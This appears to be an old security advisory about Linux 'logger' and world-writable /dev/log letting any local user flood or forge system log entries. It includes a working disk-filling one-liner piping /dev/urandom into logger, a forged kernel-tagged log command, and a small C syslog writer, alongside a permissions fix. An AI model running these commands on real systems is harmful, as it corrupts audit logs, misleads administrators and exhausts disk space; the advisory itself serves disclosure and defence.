COMMAND

    logger

SYSTEMS AFFECTED

    Linux

PROBLEM

    Vitaly McLain found following.   On Linux boxes normal users  have
    so much access  to /var/log/messages via  "logger"?  Any  user can
    do:

        cat /dev/urandom | logger &

    A couple of those will make "messages" look corrupted and fill  up
    your hard-drive.  The worst part is lines like:

        Aug 21 12:42:10 bizkit logger: I^[Ö)~z¼v*^Wf^D
        Aug 21 12:42:10 bizkit logger: ^]"Àµ_®ý¼P^S¯,´yäOsñѾ+^_^B÷tL3#­^WmÓnåbÜ^OÝ

    Couldn't  "logger"  at  least  log  which  user sent this input to
    logger?  It'd be nice, otherwise it'd be hard to track down.

    This  was  tested  under  Slackware  7.0 with stock 2.2.13 kernel.
    Here is some info:

        bizkit:~$ ls -al /dev/urandom
        crw-r--r--   1 root     root       1,   9 Dec 11  1995 /dev/urandom
        bizkit:~$ ls -al `which logger`
        -rwxr-xr-x   1 root     bin          8228 Aug  1  1999 /usr/bin/logger*
        bizkit:~$ uname -a
        Linux bizkit 2.2.13 #61 Wed Oct 20 19:40:54 CDT 1999 i586 unknown
        bizkit:~$

    This works on RedHat 6.2 and 6.1 as well.

    Any user could also do:

    #include <syslog.h>
    
    int main(void)
    {
        char buf[1000];
    
        read (0, &buf, sizeof(buf) - 1);
        openlog("foobar", 0, LOG_USER);
        syslog (LOG_NOTICE, "%s", buf);
        closelog();
    }

SOLUTION

    On Linux boxes, you have 0666 permissions on /dev/log.  That's it,
    you can not  only forge messages  (logger -p 0  -t kernel "blah"),
    but also... forge  date.  Smart  people changes these  permissions
    to something more restrictive.

    Most likely kernel developers did  wish for any application to  be
    able  to  log  messages  (notice  that the application isn't suid,
    applying a fix in /usr/bin/logger is pretty much pointless on  any
    setup with a compiler or wget).